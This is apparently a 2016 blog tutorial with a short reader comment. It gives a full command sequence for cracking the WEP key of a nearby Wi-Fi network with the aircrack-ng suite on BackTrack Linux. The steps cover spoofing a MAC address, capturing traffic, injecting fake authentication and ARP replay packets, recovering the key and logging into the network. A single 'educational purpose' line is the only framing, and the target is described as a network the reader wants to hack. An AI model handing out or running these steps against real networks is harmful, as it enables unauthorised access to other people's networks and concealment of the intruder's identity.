Tutorial for Cracking Wifi WEP Password Using Linux 2016

Tutorial for Cracking Wifi WEP Password Using Linux 2016

Tutorial for Cracking Wifi WEP Password Using Linux
Tutorial for Cracking Wifi WEP Password Using Linux 2016
This tutorial focus on Cracking Wi-Fi Password using Linux OS. In my previous post I have explained some of the most used hacking tools in 2016, make sure to read that post first here. We will be using some of those tools in Cracking WEP Passwords. Let’s start the process:

Remark: These and all tutorials at TheCyberHacker are for educational purpose.

Download the BackTrack (Linux OS) flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the Back track’s official website.

Once you have booted up backtrack, it will ask you for a username and password; for username: root & for password: toor.

Now type startx and press enter. This will log you into backtrack and you should now see the desktop.

Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.

Type in: airmon-ng

Look for the name of your wireless card, its different for a lot of computers, mine is wlan01, so for the rest of this tutorial that’s what I’m going to use. Replace wlan01 in all the following steps with whatever your device name is.

Type in command terminal: airmon-ng stop wlan01
Type in command terminal: macchanger --mac 00:11:22:33:44:55 wlan01
Type in command terminal: airmon-ng start wlan01
Type in command terminal: airodump-ng wlan01

You will now see all of the wifi networks in range. Once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.

Type in command terminal: airodump-ng -c (put the channel # here) -w wephack --bssid (enter bssid here) wlan01

Keep that window open, now open another command terminal and enter the following in the newly opened terminal:

Type in command terminal: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 wlan01
Type in command terminal: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 wlan01
Now go back to the 1st window, you'll notice a number steadily increasing. Once it’s over about 10,000 you can attempt to crack the WEP key. If this doesn't work, wait until the (Number#) is even higher, try again at a rate of 15,000 or so.

Open a new command window and type: aircrack-ng -b (enter bssid) wephack-0.cap

You should now see it attempting to crack the WEP key. This could take up to 5 minutes or so depending on how fast your computer is. When it’s found the key, it will appear on the screen. You can now log into that network using the WEP on the screen.

This tutorial can be used in Ubuntu as well, but you should install Aircracking-ng & Airmong manually because they are not installed as default. Note that these software are already installed in BackTrack OS.
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April 9, 2018 at 5:13 AM ×


Congrats bro Unknown you got PERTAMAX...! hehehehe...